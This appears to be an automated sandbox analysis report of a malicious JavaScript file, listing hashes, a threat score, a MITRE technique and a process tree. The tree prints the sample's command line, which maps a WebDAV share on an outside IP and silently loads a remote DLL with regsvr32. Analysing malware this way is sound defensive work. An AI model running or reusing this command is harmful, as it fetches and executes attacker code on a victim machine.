03a0adc8e7462f67a6ae10c4ff5ead6c63c65af0f46a64786c28c589512679b0

Analysis

max time kernel
14s
max time network
21s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
22/07/2024, 06:29

Target

1677329796220526916.js
Size

5KB
MD5

28102842db738348645fe4c7b466decd
SHA1

6762e9aad67cab001970ad32ae0b5cedc8f4a508
SHA256

639165e7f9e43ef75400c823681c44f119267e79265aa8576a3c50aac544da11
SHA512

1dd34f5da4ac17e51caa8b782ec404c0b68af2eda3937f21ffffbffbce8a9963e4942b9b81ba1c024aa0d019392a4b23613c13c8d38fa61dfdbfc291c067d5b6
SSDEEP

96:jF0xMxxJN1SyS6vnDpOyS+9td1x+P+Pw0+bukUUU6pGAkVVdw0+bukUUU6pGpvn4:jXvttx+PCw7buypGAkVVdw7buypGpXA

Score

3^/10

execution

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2908 wrote to memory of 1220	2908	wscript.exe	30
PID 2908 wrote to memory of 1220	2908	wscript.exe	30
PID 2908 wrote to memory of 1220	2908	wscript.exe	30
PID 1220 wrote to memory of 3056	1220	cmd.exe	32
PID 1220 wrote to memory of 3056	1220	cmd.exe	32
PID 1220 wrote to memory of 3056	1220	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1677329796220526916.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\44781059432313.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1220
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:3056

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

JavaScript

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact